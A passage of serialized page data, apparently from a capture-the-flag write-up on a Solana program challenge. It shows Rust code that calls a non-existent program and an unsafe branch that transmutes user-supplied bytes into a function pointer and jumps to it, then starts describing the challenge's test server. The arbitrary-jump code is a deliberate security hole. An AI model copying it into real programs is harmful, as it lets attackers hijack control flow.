"tag":137,"props":43409,"children":43410},{"style":5626},[43411],{"type":32,"value":6663},{"type":26,"tag":137,"props":43413,"children":43414},{"style":5601},[43415],{"type":32,"value":25640},{"type":26,"tag":137,"props":43417,"children":43418},{"style":6009},[43419],{"type":32,"value":10627},{"type":26,"tag":137,"props":43421,"children":43422},{"style":5601},[43423],{"type":32,"value":10195},{"type":26,"tag":137,"props":43425,"children":43426},{"style":5584},[43427],{"type":32,"value":6303},{"type":26,"tag":137,"props":43429,"children":43430},{"style":5601},[43431],{"type":32,"value":3016},{"type":26,"tag":137,"props":43433,"children":43434},{"style":5626},[43435],{"type":32,"value":6663},{"type":26,"tag":137,"props":43437,"children":43438},{"style":5590},[43439],{"type":32,"value":5634},{"type":26,"tag":137,"props":43441,"children":43442},{"style":5626},[43443],{"type":32,"value":43444},"16",{"type":26,"tag":137,"props":43446,"children":43447},{"style":5601},[43448],{"type":32,"value":3079},{"type":26,"tag":137,"props":43450,"children":43451},{"style":5590},[43452],{"type":32,"value":470},{"type":26,"tag":137,"props":43454,"children":43455},{"style":5682},[43456],{"type":32,"value":28754},{"type":26,"tag":137,"props":43458,"children":43459},{"style":5601},[43460],{"type":32,"value":16470},{"type":26,"tag":137,"props":43462,"children":43463},{"style":5590},[43464],{"type":32,"value":470},{"type":26,"tag":137,"props":43466,"children":43467},{"style":5682},[43468],{"type":32,"value":6262},{"type":26,"tag":137,"props":43470,"children":43471},{"style":5601},[43472],{"type":32,"value":18016},{"type":26,"tag":137,"props":43474,"children":43475},{"class":5559,"line":5850},[43476,43481,43485,43490,43494,43498],{"type":26,"tag":137,"props":43477,"children":43478},{"style":5584},[43479],{"type":32,"value":43480},"        ptr",{"type":26,"tag":137,"props":43482,"children":43483},{"style":5590},[43484],{"type":32,"value":470},{"type":26,"tag":137,"props":43486,"children":43487},{"style":5682},[43488],{"type":32,"value":43489},"write_volatile",{"type":26,"tag":137,"props":43491,"children":43492},{"style":5601},[43493],{"type":32,"value":165},{"type":26,"tag":137,"props":43495,"children":43496},{"style":5584},[43497],{"type":32,"value":15223},{"type":26,"tag":137,"props":43499,"children":43500},{"style":5601},[43501],{"type":32,"value":6430},{"type":26,"tag":137,"props":43503,"children":43504},{"class":5559,"line":5878},[43505],{"type":26,"tag":137,"props":43506,"children":43507},{"style":5601},[43508],{"type":32,"value":5945},{"type":26,"tag":137,"props":43510,"children":43511},{"class":5559,"line":5891},[43512],{"type":26,"tag":137,"props":43513,"children":43514},{"style":5601},[43515],{"type":32,"value":6507},{"type":26,"tag":4820,"props":43517,"children":43518},{"start":5412},[43519],{"type":26,"tag":3430,"props":43520,"children":43521},{},[43522,43523,43529],{"type":32,"value":10064},{"type":26,"tag":130,"props":43524,"children":43526},{"className":43525},[],[43527],{"type":32,"value":43528},"data[0] == 1",{"type":32,"value":43530},", a CPI to a non-existent program is executed:",{"type":26,"tag":5512,"props":43532,"children":43534},{"className":5552,"code":43533,"language":5551,"meta":7,"style":7},"#[inline(never)]\npub fn call(data: &[u8]) {\n    let ix = Instruction {\n        program_id: pubkey!(\"osecio5555555555555551111111111111111111111\"),\n        data: data.try_into().unwrap(),\n        accounts: vec![]\n    };\n\n    invoke_signed_unchecked(\n        &ix,\n        &[],\n        &[],\n    ).unwrap();\n}\n",[43535],{"type":26,"tag":130,"props":43536,"children":43537},{"__ignoreMap":7},[43538,43545,43589,43614,43644,43684,43705,43712,43719,43731,43747,43759,43770,43789],{"type":26,"tag":137,"props":43539,"children":43540},{"class":5559,"line":5560},[43541],{"type":26,"tag":137,"props":43542,"children":43543},{"style":5601},[43544],{"type":32,"value":43176},{"type":26,"tag":137,"props":43546,"children":43547},{"class":5559,"line":5412},[43548,43552,43556,43561,43565,43569,43573,43577,43581,43585],{"type":26,"tag":137,"props":43549,"children":43550},{"style":5573},[43551],{"type":32,"value":16281},{"type":26,"tag":137,"props":43553,"children":43554},{"style":5573},[43555],{"type":32,"value":16286},{"type":26,"tag":137,"props":43557,"children":43558},{"style":5682},[43559],{"type":32,"value":43560}," call",{"type":26,"tag":137,"props":43562,"children":43563},{"style":5601},[43564],{"type":32,"value":165},{"type":26,"tag":137,"props":43566,"children":43567},{"style":5584},[43568],{"type":32,"value":6303},{"type":26,"tag":137,"props":43570,"children":43571},{"style":5590},[43572],{"type":32,"value":7072},{"type":26,"tag":137,"props":43574,"children":43575},{"style":5590},[43576],{"type":32,"value":9725},{"type":26,"tag":137,"props":43578,"children":43579},{"style":5601},[43580],{"type":32,"value":3016},{"type":26,"tag":137,"props":43582,"children":43583},{"style":6009},[43584],{"type":32,"value":6012},{"type":26,"tag":137,"props":43586,"children":43587},{"style":5601},[43588],{"type":32,"value":43221},{"type":26,"tag":137,"props":43590,"children":43591},{"class":5559,"line":5417},[43592,43596,43601,43605,43610],{"type":26,"tag":137,"props":43593,"children":43594},{"style":5573},[43595],{"type":32,"value":5576},{"type":26,"tag":137,"props":43597,"children":43598},{"style":5584},[43599],{"type":32,"value":43600}," ix",{"type":26,"tag":137,"props":43602,"children":43603},{"style":5590},[43604],{"type":32,"value":5593},{"type":26,"tag":137,"props":43606,"children":43607},{"style":6009},[43608],{"type":32,"value":43609}," Instruction",{"type":26,"tag":137,"props":43611,"children":43612},{"style":5601},[43613],{"type":32,"value":5875},{"type":26,"tag":137,"props":43615,"children":43616},{"class":5559,"line":5642},[43617,43622,43626,43631,43635,43640],{"type":26,"tag":137,"props":43618,"children":43619},{"style":5584},[43620],{"type":32,"value":43621},"        program_id",{"type":26,"tag":137,"props":43623,"children":43624},{"style":5590},[43625],{"type":32,"value":7072},{"type":26,"tag":137,"props":43627,"children":43628},{"style":5682},[43629],{"type":32,"value":43630}," pubkey!",{"type":26,"tag":137,"props":43632,"children":43633},{"style":5601},[43634],{"type":32,"value":165},{"type":26,"tag":137,"props":43636,"children":43637},{"style":6837},[43638],{"type":32,"value":43639},"\"osecio5555555555555551111111111111111111111\"",{"type":26,"tag":137,"props":43641,"children":43642},{"style":5601},[43643],{"type":32,"value":9320},{"type":26,"tag":137,"props":43645,"children":43646},{"class":5559,"line":5745},[43647,43652,43656,43660,43664,43668,43672,43676,43680],{"type":26,"tag":137,"props":43648,"children":43649},{"style":5584},[43650],{"type":32,"value":43651},"        data",{"type":26,"tag":137,"props":43653,"children":43654},{"style":5590},[43655],{"type":32,"value":7072},{"type":26,"tag":137,"props":43657,"children":43658},{"style":5584},[43659],{"type":32,"value":17696},{"type":26,"tag":137,"props":43661,"children":43662},{"style":5590},[43663],{"type":32,"value":470},{"type":26,"tag":137,"props":43665,"children":43666},{"style":5682},[43667],{"type":32,"value":28754},{"type":26,"tag":137,"props":43669,"children":43670},{"style":5601},[43671],{"type":32,"value":16470},{"type":26,"tag":137,"props":43673,"children":43674},{"style":5590},[43675],{"type":32,"value":470},{"type":26,"tag":137,"props":43677,"children":43678},{"style":5682},[43679],{"type":32,"value":6262},{"type":26,"tag":137,"props":43681,"children":43682},{"style":5601},[43683],{"type":32,"value":6082},{"type":26,"tag":137,"props":43685,"children":43686},{"class":5559,"line":5850},[43687,43692,43696,43700],{"type":26,"tag":137,"props":43688,"children":43689},{"style":5584},[43690],{"type":32,"value":43691},"        accounts",{"type":26,"tag":137,"props":43693,"children":43694},{"style":5590},[43695],{"type":32,"value":7072},{"type":26,"tag":137,"props":43697,"children":43698},{"style":5682},[43699],{"type":32,"value":6330},{"type":26,"tag":137,"props":43701,"children":43702},{"style":5601},[43703],{"type":32,"value":43704},"[]\n",{"type":26,"tag":137,"props":43706,"children":43707},{"class":5559,"line":5878},[43708],{"type":26,"tag":137,"props":43709,"children":43710},{"style":5601},[43711],{"type":32,"value":41593},{"type":26,"tag":137,"props":43713,"children":43714},{"class":5559,"line":5891},[43715],{"type":26,"tag":137,"props":43716,"children":43717},{"emptyLinePlaceholder":18},[43718],{"type":32,"value":6276},{"type":26,"tag":137,"props":43720,"children":43721},{"class":5559,"line":5909},[43722,43727],{"type":26,"tag":137,"props":43723,"children":43724},{"style":5682},[43725],{"type":32,"value":43726},"    invoke_signed_unchecked",{"type":26,"tag":137,"props":43728,"children":43729},{"style":5601},[43730],{"type":32,"value":6054},{"type":26,"tag":137,"props":43732,"children":43733},{"class":5559,"line":5930},[43734,43738,43743],{"type":26,"tag":137,"props":43735,"children":43736},{"style":5590},[43737],{"type":32,"value":6062},{"type":26,"tag":137,"props":43739,"children":43740},{"style":5584},[43741],{"type":32,"value":43742},"ix",{"type":26,"tag":137,"props":43744,"children":43745},{"style":5601},[43746],{"type":32,"value":6099},{"type":26,"tag":137,"props":43748,"children":43749},{"class":5559,"line":5939},[43750,43754],{"type":26,"tag":137,"props":43751,"children":43752},{"style":5590},[43753],{"type":32,"value":6062},{"type":26,"tag":137,"props":43755,"children":43756},{"style":5601},[43757],{"type":32,"value":43758},"[],\n",{"type":26,"tag":137,"props":43760,"children":43761},{"class":5559,"line":6191},[43762,43766],{"type":26,"tag":137,"props":43763,"children":43764},{"style":5590},[43765],{"type":32,"value":6062},{"type":26,"tag":137,"props":43767,"children":43768},{"style":5601},[43769],{"type":32,"value":43758},{"type":26,"tag":137,"props":43771,"children":43772},{"class":5559,"line":6208},[43773,43777,43781,43785],{"type":26,"tag":137,"props":43774,"children":43775},{"style":5601},[43776],{"type":32,"value":6253},{"type":26,"tag":137,"props":43778,"children":43779},{"style":5590},[43780],{"type":32,"value":470},{"type":26,"tag":137,"props":43782,"children":43783},{"style":5682},[43784],{"type":32,"value":6262},{"type":26,"tag":137,"props":43786,"children":43787},{"style":5601},[43788],{"type":32,"value":6267},{"type":26,"tag":137,"props":43790,"children":43791},{"class":5559,"line":6225},[43792],{"type":26,"tag":137,"props":43793,"children":43794},{"style":5601},[43795],{"type":32,"value":6507},{"type":26,"tag":4820,"props":43797,"children":43798},{"start":5417},[43799],{"type":26,"tag":3430,"props":43800,"children":43801},{},[43802,43804,43810],{"type":32,"value":43803},"Finally, if ",{"type":26,"tag":130,"props":43805,"children":43807},{"className":43806},[],[43808],{"type":32,"value":43809},"data[0]",{"type":32,"value":43811}," is neither 0 nor 1, a function that lets you jump to an arbitrary address, passing an arbitrary value as the first parameter is executed:",{"type":26,"tag":5512,"props":43813,"children":43815},{"className":5552,"code":43814,"language":5551,"meta":7,"style":7},"#[inline(never)]\npub fn process(mut data: &[u8]) {\n    unsafe {\n        let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr(val);\n\n        data = &data[16..];\n\n        let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr(val);\n    }\n}\n",[43816],{"type":26,"tag":130,"props":43817,"children":43818},{"__ignoreMap":7},[43819,43826,43874,43885,44005,44120,44139,44146,44181,44188,44307,44422,44441,44448],{"type":26,"tag":137,"props":43820,"children":43821},{"class":5559,"line":5560},[43822],{"type":26,"tag":137,"props":43823,"children":43824},{"style":5601},[43825],{"type":32,"value":43176},{"type":26,"tag":137,"props":43827,"children":43828},{"class":5559,"line":5412},[43829,43833,43837,43842,43846,43850,43854,43858,43862,43866,43870],{"type":26,"tag":137,"props":43830,"children":43831},{"style":5573},[43832],{"type":32,"value":16281},{"type":26,"tag":137,"props":43834,"children":43835},{"style":5573},[43836],{"type":32,"value":16286},{"type":26,"tag":137,"props":43838,"children":43839},{"style":5682},[43840],{"type":32,"value":43841}," process",{"type":26,"tag":137,"props":43843,"children":43844},{"style":5601},[43845],{"type":32,"value":165},{"type":26,"tag":137,"props":43847,"children":43848},{"style":5573},[43849],{"type":32,"value":6325},{"type":26,"tag":137,"props":43851,"children":43852},{"style":5584},[43853],{"type":32,"value":17696},{"type":26,"tag":137,"props":43855,"children":43856},{"style":5590},[43857],{"type":32,"value":7072},{"type":26,"tag":137,"props":43859,"children":43860},{"style":5590},[43861],{"type":32,"value":9725},{"type":26,"tag":137,"props":43863,"children":43864},{"style":5601},[43865],{"type":32,"value":3016},{"type":26,"tag":137,"props":43867,"children":43868},{"style":6009},[43869],{"type":32,"value":6012},{"type":26,"tag":137,"props":43871,"children":43872},{"style":5601},[43873],{"type":32,"value":43221},{"type":26,"tag":137,"props":43875,"children":43876},{"class":5559,"line":5417},[43877,43881],{"type":26,"tag":137,"props":43878,"children":43879},{"style":5573},[43880],{"type":32,"value":16424},{"type":26,"tag":137,"props":43882,"children":43883},{"style":5601},[43884],{"type":32,"value":5875},{"type":26,"tag":137,"props":43886,"children":43887},{"class":5559,"line":5642},[43888,43892,43896,43900,43904,43908,43912,43916,43920,43924,43928,43932,43936,43940,43944,43948,43952,43956,43961,43965,43969,43973,43977,43981,43985,43989,43993,43997,44001],{"type":26,"tag":137,"props":43889,"children":43890},{"style":5573},[43891],{"type":32,"value":5648},{"type":26,"tag":137,"props":43893,"children":43894},{"style":5584},[43895],{"type":32,"value":16448},{"type":26,"tag":137,"props":43897,"children":43898},{"style":5590},[43899],{"type":32,"value":5593},{"type":26,"tag":137,"props":43901,"children":43902},{"style":5601},[43903],{"type":32,"value":43252},{"type":26,"tag":137,"props":43905,"children":43906},{"style":5590},[43907],{"type":32,"value":6072},{"type":26,"tag":137,"props":43909,"children":43910},{"style":5601},[43911],{"type":32,"value":43261},{"type":26,"tag":137,"props":43913,"children":43914},{"style":5590},[43915],{"type":32,"value":6072},{"type":26,"tag":137,"props":43917,"children":43918},{"style":5682},[43919],{"type":32,"value":43270},{"type":26,"tag":137,"props":43921,"children":43922},{"style":5590},[43923],{"type":32,"value":6072},{"type":26,"tag":137,"props":43925,"children":43926},{"style":5601},[43927],{"type":32,"value":43279},{"type":26,"tag":137,"props":43929,"children":43930},{"style":6009},[43931],{"type":32,"value":6012},{"type":26,"tag":137,"props":43933,"children":43934},{"style":5601},[43935],{"type":32,"value":19820},{"type":26,"tag":137,"props":43937,"children":43938},{"style":5626},[43939],{"type":32,"value":6663},{"type":26,"tag":137,"props":43941,"children":43942},{"style":5601},[43943],{"type":32,"value":25640},{"type":26,"tag":137,"props":43945,"children":43946},{"style":5573},[43947],{"type":32,"value":22860},{"type":26,"tag":137,"props":43949,"children":43950},{"style":5601},[43951],{"type":32,"value":165},{"type":26,"tag":137,"props":43953,"children":43954},{"style":6009},[43955],{"type":32,"value":10627},{"type":26,"tag":137,"props":43957,"children":43958},{"style":5601},[43959],{"type":32,"value":43960},")>(",{"type":26,"tag":137,"props":43962,"children":43963},{"style":5584},[43964],{"type":32,"value":6303},{"type":26,"tag":137,"props":43966,"children":43967},{"style":5601},[43968],{"type":32,"value":3016},{"type":26,"tag":137,"props":43970,"children":43971},{"style":5590},[43972],{"type":32,"value":5634},{"type":26,"tag":137,"props":43974,"children":43975},{"style":5626},[43976],{"type":32,"value":6663},{"type":26,"tag":137,"props":43978,"children":43979},{"style":5601},[43980],{"type":32,"value":3079},{"type":26,"tag":137,"props":43982,"children":43983},{"style":5590},[43984],{"type":32,"value":470},{"type":26,"tag":137,"props":43986,"children":43987},{"style":5682},[43988],{"type":32,"value":28754},{"type":26,"tag":137,"props":43990,"children":43991},{"style":5601},[43992],{"type":32,"value":16470},{"type":26,"tag":137,"props":43994,"children":43995},{"style":5590},[43996],{"type":32,"value":470},{"type":26,"tag":137,"props":43998,"children":43999},{"style":5682},[44000],{"type":32,"value":6262},{"type":26,"tag":137,"props":44002,"children":44003},{"style":5601},[44004],{"type":32,"value":18016},{"type":26,"tag":137,"props":44006,"children":44007},{"class":5559,"line":5745},[44008,44012,44016,44020,44024,44028,44032,44036,44040,44044,44048,44052,44056,44060,44064,44068,44072,44076,44080,44084,44088,44092,44096,44100,44104,44108,44112,44116],{"type":26,"tag":137,"props":44009,"children":44010},{"style":5573},[44011],{"type":32,"value":5648},{"type":26,"tag":137,"props":44013,"children":44014},{"style":5584},[44015],{"type":32,"value":43367},{"type":26,"tag":137,"props":44017,"children":44018},{"style":5590},[44019],{"type":32,"value":5593},{"type":26,"tag":137,"props":44021,"children":44022},{"style":5601},[44023],{"type":32,"value":43252},{"type":26,"tag":137,"props":44025,"children":44026},{"style":5590},[44027],{"type":32,"value":6072},{"type":26,"tag":137,"props":44029,"children":44030},{"style":5601},[44031],{"type":32,"value":43261},{"type":26,"tag":137,"props":44033,"children":44034},{"style":5590},[44035],{"type":32,"value":6072},{"type":26,"tag":137,"props":44037,"children":44038},{"style":5682},[44039],{"type":32,"value":43270},{"type":26,"tag":137,"props":44041,"children":44042},{"style":5590},[44043],{"type":32,"value":6072},{"type":26,"tag":137,"props":44045,"children":44046},{"style":5601},[44047],{"type":32,"value":43279},{"type":26,"tag":137,"props":44049,"children":44050},{"style":6009},[44051],{"type":32,"value":6012},{"type":26,"tag":137,"props":44053,"children":44054},{"style":5601},[44055],{"type":32,"value":19820},{"type":26,"tag":137,"props":44057,"children":44058},{"style":5626},[44059],{"type":32,"value":6663},{"type":26,"tag":137,"props":44061,"children":44062},{"style":5601},[44063],{"type":32,"value":25640},{"type":26,"tag":137,"props":44065,"children":44066},{"style":6009},[44067],{"type":32,"value":10627},{"type":26,"tag":137,"props":44069,"children":44070},{"style":5601},[44071],{"type":32,"value":10195},{"type":26,"tag":137,"props":44073,"children":44074},{"style":5584},[44075],{"type":32,"value":6303},{"type":26,"tag":137,"props":44077,"children":44078},{"style":5601},[44079],{"type":32,"value":3016},{"type":26,"tag":137,"props":44081,"children":44082},{"style":5626},[44083],{"type":32,"value":6663},{"type":26,"tag":137,"props":44085,"children":44086},{"style":5590},[44087],{"type":32,"value":5634},{"type":26,"tag":137,"props":44089,"children":44090},{"style":5626},[44091],{"type":32,"value":43444},{"type":26,"tag":137,"props":44093,"children":44094},{"style":5601},[44095],{"type":32,"value":3079},{"type":26,"tag":137,"props":44097,"children":44098},{"style":5590},[44099],{"type":32,"value":470},{"type":26,"tag":137,"props":44101,"children":44102},{"style":5682},[44103],{"type":32,"value":28754},{"type":26,"tag":137,"props":44105,"children":44106},{"style":5601},[44107],{"type":32,"value":16470},{"type":26,"tag":137,"props":44109,"children":44110},{"style":5590},[44111],{"type":32,"value":470},{"type":26,"tag":137,"props":44113,"children":44114},{"style":5682},[44115],{"type":32,"value":6262},{"type":26,"tag":137,"props":44117,"children":44118},{"style":5601},[44119],{"type":32,"value":18016},{"type":26,"tag":137,"props":44121,"children":44122},{"class":5559,"line":5850},[44123,44127,44131,44135],{"type":26,"tag":137,"props":44124,"children":44125},{"style":5682},[44126],{"type":32,"value":43480},{"type":26,"tag":137,"props":44128,"children":44129},{"style":5601},[44130],{"type":32,"value":165},{"type":26,"tag":137,"props":44132,"children":44133},{"style":5584},[44134],{"type":32,"value":15223},{"type":26,"tag":137,"props":44136,"children":44137},{"style":5601},[44138],{"type":32,"value":6430},{"type":26,"tag":137,"props":44140,"children":44141},{"class":5559,"line":5878},[44142],{"type":26,"tag":137,"props":44143,"children":44144},{"emptyLinePlaceholder":18},[44145],{"type":32,"value":6276},{"type":26,"tag":137,"props":44147,"children":44148},{"class":5559,"line":5891},[44149,44153,44157,44161,44165,44169,44173,44177],{"type":26,"tag":137,"props":44150,"children":44151},{"style":5584},[44152],{"type":32,"value":43651},{"type":26,"tag":137,"props":44154,"children":44155},{"style":5590},[44156],{"type":32,"value":5593},{"type":26,"tag":137,"props":44158,"children":44159},{"style":5590},[44160],{"type":32,"value":9725},{"type":26,"tag":137,"props":44162,"children":44163},{"style":5584},[44164],{"type":32,"value":6303},{"type":26,"tag":137,"props":44166,"children":44167},{"style":5601},[44168],{"type":32,"value":3016},{"type":26,"tag":137,"props":44170,"children":44171},{"style":5626},[44172],{"type":32,"value":43444},{"type":26,"tag":137,"props":44174,"children":44175},{"style":5590},[44176],{"type":32,"value":5634},{"type":26,"tag":137,"props":44178,"children":44179},{"style":5601},[44180],{"type":32,"value":34169},{"type":26,"tag":137,"props":44182,"children":44183},{"class":5559,"line":5909},[44184],{"type":26,"tag":137,"props":44185,"children":44186},{"emptyLinePlaceholder":18},[44187],{"type":32,"value":6276},{"type":26,"tag":137,"props":44189,"children":44190},{"class":5559,"line":5930},[44191,44195,44199,44203,44207,44211,44215,44219,44223,44227,44231,44235,44239,44243,44247,44251,44255,44259,44263,44267,44271,44275,44279,44283,44287,44291,44295,44299,44303],{"type":26,"tag":137,"props":44192,"children":44193},{"style":5573},[44194],{"type":32,"value":5648},{"type":26,"tag":137,"props":44196,"children":44197},{"style":5584},[44198],{"type":32,"value":16448},{"type":26,"tag":137,"props":44200,"children":44201},{"style":5590},[44202],{"type":32,"value":5593},{"type":26,"tag":137,"props":44204,"children":44205},{"style":5601},[44206],{"type":32,"value":43252},{"type":26,"tag":137,"props":44208,"children":44209},{"style":5590},[44210],{"type":32,"value":6072},{"type":26,"tag":137,"props":44212,"children":44213},{"style":5601},[44214],{"type":32,"value":43261},{"type":26,"tag":137,"props":44216,"children":44217},{"style":5590},[44218],{"type":32,"value":6072},{"type":26,"tag":137,"props":44220,"children":44221},{"style":5682},[44222],{"type":32,"value":43270},{"type":26,"tag":137,"props":44224,"children":44225},{"style":5590},[44226],{"type":32,"value":6072},{"type":26,"tag":137,"props":44228,"children":44229},{"style":5601},[44230],{"type":32,"value":43279},{"type":26,"tag":137,"props":44232,"children":44233},{"style":6009},[44234],{"type":32,"value":6012},{"type":26,"tag":137,"props":44236,"children":44237},{"style":5601},[44238],{"type":32,"value":19820},{"type":26,"tag":137,"props":44240,"children":44241},{"style":5626},[44242],{"type":32,"value":6663},{"type":26,"tag":137,"props":44244,"children":44245},{"style":5601},[44246],{"type":32,"value":25640},{"type":26,"tag":137,"props":44248,"children":44249},{"style":5573},[44250],{"type":32,"value":22860},{"type":26,"tag":137,"props":44252,"children":44253},{"style":5601},[44254],{"type":32,"value":165},{"type":26,"tag":137,"props":44256,"children":44257},{"style":6009},[44258],{"type":32,"value":10627},{"type":26,"tag":137,"props":44260,"children":44261},{"style":5601},[44262],{"type":32,"value":43960},{"type":26,"tag":137,"props":44264,"children":44265},{"style":5584},[44266],{"type":32,"value":6303},{"type":26,"tag":137,"props":44268,"children":44269},{"style":5601},[44270],{"type":32,"value":3016},{"type":26,"tag":137,"props":44272,"children":44273},{"style":5590},[44274],{"type":32,"value":5634},{"type":26,"tag":137,"props":44276,"children":44277},{"style":5626},[44278],{"type":32,"value":6663},{"type":26,"tag":137,"props":44280,"children":44281},{"style":5601},[44282],{"type":32,"value":3079},{"type":26,"tag":137,"props":44284,"children":44285},{"style":5590},[44286],{"type":32,"value":470},{"type":26,"tag":137,"props":44288,"children":44289},{"style":5682},[44290],{"type":32,"value":28754},{"type":26,"tag":137,"props":44292,"children":44293},{"style":5601},[44294],{"type":32,"value":16470},{"type":26,"tag":137,"props":44296,"children":44297},{"style":5590},[44298],{"type":32,"value":470},{"type":26,"tag":137,"props":44300,"children":44301},{"style":5682},[44302],{"type":32,"value":6262},{"type":26,"tag":137,"props":44304,"children":44305},{"style":5601},[44306],{"type":32,"value":18016},{"type":26,"tag":137,"props":44308,"children":44309},{"class":5559,"line":5939},[44310,44314,44318,44322,44326,44330,44334,44338,44342,44346,44350,44354,44358,44362,44366,44370,44374,44378,44382,44386,44390,44394,44398,44402,44406,44410,44414,44418],{"type":26,"tag":137,"props":44311,"children":44312},{"style":5573},[44313],{"type":32,"value":5648},{"type":26,"tag":137,"props":44315,"children":44316},{"style":5584},[44317],{"type":32,"value":43367},{"type":26,"tag":137,"props":44319,"children":44320},{"style":5590},[44321],{"type":32,"value":5593},{"type":26,"tag":137,"props":44323,"children":44324},{"style":5601},[44325],{"type":32,"value":43252},{"type":26,"tag":137,"props":44327,"children":44328},{"style":5590},[44329],{"type":32,"value":6072},{"type":26,"tag":137,"props":44331,"children":44332},{"style":5601},[44333],{"type":32,"value":43261},{"type":26,"tag":137,"props":44335,"children":44336},{"style":5590},[44337],{"type":32,"value":6072},{"type":26,"tag":137,"props":44339,"children":44340},{"style":5682},[44341],{"type":32,"value":43270},{"type":26,"tag":137,"props":44343,"children":44344},{"style":5590},[44345],{"type":32,"value":6072},{"type":26,"tag":137,"props":44347,"children":44348},{"style":5601},[44349],{"type":32,"value":43279},{"type":26,"tag":137,"props":44351,"children":44352},{"style":6009},[44353],{"type":32,"value":6012},{"type":26,"tag":137,"props":44355,"children":44356},{"style":5601},[44357],{"type":32,"value":19820},{"type":26,"tag":137,"props":44359,"children":44360},{"style":5626},[44361],{"type":32,"value":6663},{"type":26,"tag":137,"props":44363,"children":44364},{"style":5601},[44365],{"type":32,"value":25640},{"type":26,"tag":137,"props":44367,"children":44368},{"style":6009},[44369],{"type":32,"value":10627},{"type":26,"tag":137,"props":44371,"children":44372},{"style":5601},[44373],{"type":32,"value":10195},{"type":26,"tag":137,"props":44375,"children":44376},{"style":5584},[44377],{"type":32,"value":6303},{"type":26,"tag":137,"props":44379,"children":44380},{"style":5601},[44381],{"type":32,"value":3016},{"type":26,"tag":137,"props":44383,"children":44384},{"style":5626},[44385],{"type":32,"value":6663},{"type":26,"tag":137,"props":44387,"children":44388},{"style":5590},[44389],{"type":32,"value":5634},{"type":26,"tag":137,"props":44391,"children":44392},{"style":5626},[44393],{"type":32,"value":43444},{"type":26,"tag":137,"props":44395,"children":44396},{"style":5601},[44397],{"type":32,"value":3079},{"type":26,"tag":137,"props":44399,"children":44400},{"style":5590},[44401],{"type":32,"value":470},{"type":26,"tag":137,"props":44403,"children":44404},{"style":5682},[44405],{"type":32,"value":28754},{"type":26,"tag":137,"props":44407,"children":44408},{"style":5601},[44409],{"type":32,"value":16470},{"type":26,"tag":137,"props":44411,"children":44412},{"style":5590},[44413],{"type":32,"value":470},{"type":26,"tag":137,"props":44415,"children":44416},{"style":5682},[44417],{"type":32,"value":6262},{"type":26,"tag":137,"props":44419,"children":44420},{"style":5601},[44421],{"type":32,"value":18016},{"type":26,"tag":137,"props":44423,"children":44424},{"class":5559,"line":6191},[44425,44429,44433,44437],{"type":26,"tag":137,"props":44426,"children":44427},{"style":5682},[44428],{"type":32,"value":43480},{"type":26,"tag":137,"props":44430,"children":44431},{"style":5601},[44432],{"type":32,"value":165},{"type":26,"tag":137,"props":44434,"children":44435},{"style":5584},[44436],{"type":32,"value":15223},{"type":26,"tag":137,"props":44438,"children":44439},{"style":5601},[44440],{"type":32,"value":6430},{"type":26,"tag":137,"props":44442,"children":44443},{"class":5559,"line":6208},[44444],{"type":26,"tag":137,"props":44445,"children":44446},{"style":5601},[44447],{"type":32,"value":5945},{"type":26,"tag":137,"props":44449,"children":44450},{"class":5559,"line":6225},[44451],{"type":26,"tag":137,"props":44452,"children":44453},{"style":5601},[44454],{"type":32,"value":6507},{"type":26,"tag":118,"props":44456,"children":44458},{"id":44457},"test-environment",[44459],{"type":32,"value":44460},"Test Environment",{"type":26,"tag":35,"props":44462,"children":44463},{},[44464],{"type":32,"value":44465},"To understand our capabilites regarding interaction with the program and determine what is necessary to get the flag, we must analyze the test environment.",{"type":26,"tag":35,"props":44467,"children":44468},{},[44469,44471,44477],{"type":32,"value":44470},"When you connect to the server through a tcp connection, ",{"type":26,"tag":130,"props":44472,"children":44474},{"className":44473},[],[44475],{"type":32,"value":44476},"framework/src/main.rs::handle_connection",{"type":32,"value":44478}," gets executed, which does the following:",{"type":26,"tag":4820,"props":44480,"children":44481},{},[44482],{"type":26,"tag":3430,"props":44483,"children":44484},{},[44485],{"type":32,"value":44486},"Creates a new Solana local node",{"type":26,"tag":5512,"props":44488,"children":44490},{"className":5552,"code":44489,"language":5551,"meta":7,"style":7},"let mut builder = ChallengeBuilder::try_from(socket.try_clone().unwrap()).unwrap();\nassert!(builder.add_program(\"/path/to/chall.so\", Some(chall::ID)) == chall::ID);\nlet mut chall = builder.build().await;\n",[44491],{"type":26,"tag":130,"props":44492,"children":44493},{"__ignoreMap":7},[44494,44575,44651],{"type":26,"tag":137,"props":44495,"children":44496},{"class":5559,"line":5560},[44497,44501,44505,44510,44514,44519,44523,44528,44532,44537,44541,44546,44550,44554,44558,44563,44567,44571],{"type":26,"tag":137,"props":44498,"children":44499},{"style":5573},[44500],{"type":32,"value":14378},{"type":26,"tag":137,"props":44502,"children":44503},{"style":5573},[44504],{"type":32,"value":5581},{"type":26,"tag":137,"props":44506,"children":44507},{"style":5584},[44508],{"type":32,"value":44509}," builder",{"type":26,"tag":137,"props":44511,"children":44512},{"style":5590},[44513],{"type":32,"value":5593},{"type":26,"tag":137,"props":44515,"children":44516},{"style":6009},[44517],{"type":32,"value":44518}," ChallengeBuilder",{"type":26,"tag":137,"props":44520,"children":44521},{"style":5590},[44522],{"type":32,"value":6072},{"type":26,"tag":137,"props":44524,"children":44525},{"style":5682},[44526],{"type":32,"value":44527},"try_from",{"type":26,"tag":137,"props":44529,"children":44530},{"style":5601},[44531],{"type":32,"value":165},{"type":26,"tag":137,"props":44533,"children":44534},{"style":5584},[44535],{"type":32,"value":44536},"socket",{"type":26,"tag":137,"props":44538,"children":44539},{"style":5590},[44540],{"type":32,"value":470},{"type":26,"tag":137,"props":44542,"children":44543},{"style":5682},[44544],{"type":32,"value":44545},"try_clone",{"type":26,"tag":137,"props":44547,"children":44548},{"style":5601},[44549],{"type":32,"value":16470},{"type":26,"tag":137,"props":44551,"children":44552},{"style":5590},[44553],{"type":32,"value":470},{"type":26,"tag":137,"props":44555,"children":44556},{"style":5682},[44557],{"type":32,"value":6262},{"type":26,"tag":137,"props":44559,"children":44560},{"style":5601},[44561],{"type":32,"value":44562},"())",{"type":26,"tag":137,"props":44564,"children":44565},{"style":5590},[44566],{"type":32,"value":470},{"type":26,"tag":137,"props":44568,"children":44569},{"style":5682},[44570],{"type":32,"value":6262},{"type":26,"tag":137,"props":44